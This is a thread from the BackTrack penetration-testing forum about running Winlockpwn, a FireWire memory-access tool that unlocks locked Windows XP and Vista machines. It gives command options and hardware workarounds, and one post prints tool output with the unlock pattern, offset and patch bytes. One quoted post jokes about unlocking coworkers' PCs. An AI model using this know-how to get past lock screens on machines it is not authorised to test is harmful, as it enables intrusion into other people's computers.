Tutorial Winlockpwn

**tmaletic** · 10-08-2008, 02:49 PM

Was doing some testing against filevault and finally realized I had access to another rom type. So here's attached a csr file snarfed from a powerbook g4 in case anyone can find a use for it. Unfortunately, it acts just like the ipod.csr when used to spoof the remote end of a firewire connection to Vista - at least for me. -tm

**gromeo** · 11-05-2008, 04:23 PM

I am having issues with it - any time I run ./businfo, nodecount=0, and anytime I run winlockpwn, it dies on the line where it tries to determine on which node it is.... the array just breaks... line 120.

**williamc** · 11-05-2008, 05:01 PM

So you run ./businfo. What does the ipod.csr come up as? It should be the only device, therefore port 0. Are you entering nodecount=0? You shouldnt have to.

**komseh** · 11-07-2008, 10:01 AM

Originally Posted by williamc

Updated Winlockpwn to support Vista and XP SP3.

Any chance you'd be willing to search for offset values for regular and FUS unlocking in SP3? I'm gonna give it a shot this weekend, but I have never really analyzed or parsed memory addresses. I'll try to use the example provided at the moonloop site.

**imported_l1nuxant_ee** · 12-24-2008, 05:23 PM

Hello Guys,

Would this work if I have a USB-to-Firewire cable? I am planning to plug he USB in BackTrack and the Firewire in the Windows machine.

Thanks in advance,

**xikaoheizi** · 12-28-2008, 08:39 AM

Hi,all
did you successfully unlock vista using your code?

I'm researching this, but if anyone can shed some light on it, please do. I've purchased a cardbus firewire card for use on PC's that dont have Firewire ports. You can plug it into a locked PC and the OS will install the drivers. Then just run winlockpwn and your in! Guys in my office have disabled Firewire in the BIOS and set a password. Now I'll spend a lunch unlocking everyone's PC. What a surprise when they get back, hehe.

An important note, if your running this, use winlockpwn 0 1 2 instead of 0 1 3. The 3 option removes the password on all the accounts which may cause some "issues" if your in a corporate environment. the 2 option only unlocks the PC, should be enough for whatever mischief your planning (and have permission to do so).

William[/QUOTE]

**xikaoheizi** · 12-28-2008, 08:55 AM

willamc,
I've tested winlockpwn on windows xp sp2 with latest update. It failed to unlock windows xp sp2. But if I use a windows xp sp2 box without latest, winlockpwn works well. I used msv1.0 technique.

**xikaoheizi** · 12-28-2008, 08:58 AM

As I know, not USB-to-Firewire device. Currently I successfully unlocked winxp using PCMCIA-1394 and express card -1394.

Originally Posted by l1nuxant_ee

Hello Guys,

Would this work if I have a USB-to-Firewire cable? I am planning to plug he USB in BackTrack and the Firewire in the Windows machine.

Thanks in advance,

**GaryPod** · 02-17-2009, 09:22 AM

Hi,

I'm getting the following error when trying to run winlockpwn...

Code:

bt winlockpwn # ./winlockpwn 0 0 2
Winlockpwn v1.5 Metlstorm, 2k6. <metlstorm@storm.net.nz>
Target Selection:
 Name   : WinXP SP2 Unlock
 Notes  : When run against a locked XPSP2 box with regular non-fast-user-switching, it will cause all passwords to succeed. You'll still get the password-is-wrong dialog, but then you'll get logged in anyway.
 Pattern: 0x0502000010
 Offset : [3696]
 Patch  : 0xb801000000
 Offset : 0
Scanning Options:
 Start  : 0x8000000
 Stop   : 0xffffffff
 Pagesz : 4096
Init firwire, port 0 node 0
Snarfin' memories...
Checking for signature on page at 0x08000000 (131072kB) at 0 kB/s...
Traceback (most recent call last):
  File "./winlockpwn", line 163, in <module>
    mem = n.read(offset + so , len(pattern))
  File "/root/pythonraw1394/firewire.py", line 715, in read
    data +=str(raw1394.raw1394_py_read(self.port.h.h, self.getNodeID(), long(addrhi), long(addrlo), maxb))
IOError: [Errno 22] Invalid argument

My businfo is hwoing:

Code:

bt winlockpwn # ./businfo
Firewire initialized, with 1 ports available:
Enumerating port & node tree...
Port(number=0, generation=17, busid=1023, localid=0, nodeCount=2, name='ohci1394')
Node(number=0, nodeid=0xffc0)
ConfigROM(
 Length                               : 16 bytes
 CRC Length                           : 16 bytes
 CRC                                  : 0x7286 (Valid)
 Bus ID                               : "1394"
 GUID                                 : 0x000a270002aa6ba7
 Vendor                               : 0x00000a27 (Apple Computer, Inc.)
 Link Speed                           : 2 (S400)
 Max Record Size                      : 10 (2048 bytes)
 Isochronous Capable                  : 0 (No)
 Bus Master Capable                   : 0 (No)
 Cycle Master Capable                 : 0 (No)
 Cycle Master Clock Accuracy          : 0 ppm
 Isochronous Resource Manager Capable : 0 (No)
 Root Directory: 16 bytes, crc: 0xf93c (Valid)
  0 (Immediate Value), 12 (Node Capabilities): 0x83c0
  0 (Immediate Value), 3 (Module Vendor ID): 0xa27 (Apple Computer, Inc.)
  2 (Offset to Leaf), 1 (Textual Descriptor): Offset: 68 bytes
   TextLeaf: 32 bytes, crc: 0x96bc (Valid), language spec: 0x00000000 (XEROX CORPORATION), language id: 0x00000000,
   text: "Apple Computer, Inc."
  3 (Offset to Directory), 17 (Unit Directory): Offset: 4 bytes
    Unit Directory: 56 bytes, crc: 0xe5a0 (Valid)
    0 (Immediate Value), 18 (Unit Spec ID): 0x609e (ASC X3 - INFORMATION TECHNOLOGY STANDARDS SECRETARIATS)
    0 (Immediate Value), 19 (Unit SW Version): 0x10483
    0 (Immediate Value), 33 (Unknown 33): 0x1
    0 (Immediate Value), 58 (Unknown 58): 0xa08
    0 (Immediate Value), 62 (Unknown 62): 0x4c10
    0 (Immediate Value), 56 (Unknown 56): 0x609e
    0 (Immediate Value), 57 (Unknown 57): 0x104d8
    0 (Immediate Value), 59 (Unknown 59): 0x0
    0 (Immediate Value), 60 (Unknown 60): 0xa2700
    1 (Offset to Immediate Value), 20 (Unit Dependant Info): Offset: 65536 bytes Offset Data: **Offset to immediate beyond end of CSR space**
    0 (Immediate Value), 61 (Unknown 61): 0x3
    0 (Immediate Value), 20 (Unit Dependant Info): 0xe0000
    0 (Immediate Value), 23 (Model ID): 0x21
    2 (Offset to Leaf), 1 (Textual Descriptor): Offset: 40 bytes
     TextLeaf: 16 bytes, crc: 0x34e7 (Valid), language spec: 0x00000000 (XEROX CORPORATION), language id: 0x00000000,
     text: "iPod"
)
Node(number=1, nodeid=0xffc1)
ConfigROM(
 Length                               : 16 bytes
 CRC Length                           : 16 bytes
 CRC                                  : 0x7a41 (Invalid (0x2a72))
 Bus ID                               : "1394"
 GUID                                 : 0x00110666000007e6
 Vendor                               : 0x00001106 (Siemens NV (Belgium))
 Link Speed                           : 2 (S400)
 Max Record Size                      : 10 (2048 bytes)
 Isochronous Capable                  : 1 (Yes)
 Bus Master Capable                   : 1 (Yes)
 Cycle Master Capable                 : 1 (Yes)
 Cycle Master Clock Accuracy          : 0 ppm
 Isochronous Resource Manager Capable : 1 (Yes)
 Root Directory: 32 bytes, crc: 0x10cb (Invalid (0x0a69))
  0 (Immediate Value), 12 (Node Capabilities): 0x83c0
  0 (Immediate Value), 28 (Unknown 28): 0x50f2
  0 (Immediate Value), 29 (Unknown 29): 0x2
  0 (Immediate Value), 30 (Unknown 30): 0x0
  0 (Immediate Value), 3 (Module Vendor ID): 0x50f2 (MICROSOFT CORP.)
  2 (Offset to Leaf), 1 (Textual Descriptor): Offset: 32 bytes
   TextLeaf: 32 bytes, crc: 0x7c05 (Invalid (0x1183)), language spec: 0x80000000 (), language id: 0x00000409,
   text: "Microsoft"
  3 (Offset to Directory), 17 (Unit Directory): Offset: 8 bytes
    Unit Directory: 16 bytes, crc: 0xade9 (Invalid (0x12e4))
    0 (Immediate Value), 18 (Unit Spec ID): 0x50f2 (MICROSOFT CORP.)
    0 (Immediate Value), 19 (Unit SW Version): 0x0
    0 (Immediate Value), 23 (Model ID): 0x0
    2 (Offset to Leaf), 1 (Textual Descriptor): Offset: 40 bytes
     TextLeaf: 48 bytes, crc: 0xfc7d (Invalid (0xd16f)), language spec: 0x80000000 (), language id: 0x00000409,
     text: "1394 PC"
  3 (Offset to Directory), 17 (Unit Directory): Offset: 112 bytes
    Unit Directory: 16 bytes, crc: 0xadeb (Invalid (0x5178))
    0 (Immediate Value), 18 (Unit Spec ID): 0x5e (USC INFORMATION SCIENCES INST)
    0 (Immediate Value), 19 (Unit SW Version): 0x1
    0 (Immediate Value), 23 (Model ID): 0x7bb0cf
    2 (Offset to Leaf), 1 (Textual Descriptor): Offset: 4 bytes
     TextLeaf: 24 bytes, crc: 0x3891 (Invalid (0xb6f2)), language spec: 0x80000000 (), language id: 0x00000409,
     text: "NIC1394"
)

I've been trying to get this working for a few days now, could anyone point out what I'm doing wrong? I've tried using ./winlockpwn 0 0 2 and ./winlockpwn 0 1 2...

Cheers

**GaryPod** · 02-17-2009, 03:24 PM

Apparently i need to rename or move the sbp2.ko module...

BackTrack Linux - Penetration Testing Distribution

Thread: Tutorial Winlockpwn

Thread Tools

Search Thread

Display

Posting Permissions